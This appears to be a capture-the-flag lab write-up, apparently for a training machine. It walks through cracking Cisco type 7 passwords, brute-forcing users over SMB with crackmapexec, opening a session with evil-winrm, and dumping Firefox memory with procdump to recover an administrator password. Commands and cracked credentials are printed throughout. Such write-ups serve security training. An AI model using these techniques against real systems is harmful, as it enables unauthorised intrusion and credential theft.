DOC
https://live.sysinternals.com/
NETWORK
DIR SCANS
ENUMERATION
Looking into the site we have found the following
Cracking cisco passwords
Here is the list of available passwords leaked by the attachment posted by user Hazard
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
We can crack those
wget https://raw.githubusercontent.com/theevilbit/ciscot7/master/ciscot7.py python ciscot7.py -d -p 02375012182C1A1D751618034F36415408
admin:Q4)sJu\Y8qz*A3?d
rout3r:$uperP@ssword
stealth1agent
FOOTHOLD
SMB access as Hazard
Looking back into the support messages we can see that the user Hazard as asked for an account on the server. Testing the user Hazard access against the password found earlier we get a match
Enum users
Using crackmapexec flag “–rid-brute” we are able to enumerate (brute force) some users by bruteforcing RID’s
crackmapexec smb 10.10.10.149 -u hazard -p stealh1agent --rid-brute
Checking the passwords we have collected against those users, we were able to confirm user Chase’s password
Low access as Chase
Using evil-winrm against the server we are able to get a session as user Chase
PRIV ESCALATION
Enum
The message implies that there is a list somewhere but a we couldn’t find anything then went on to check the processes and saw few firefox instances
Dumping memory
After a bit of researches we found the following page https://live.sysinternals.com/ with the binary procdump.exe
Processing memory dumps
Using the following command, we are able to analyse the dump searching for information like “password”
grep -rnio --text 'password' 'C:\Users\Chase\Documents\firefox.exe_220731_035912.dmp
Thanks to that analysis we have found the administrator password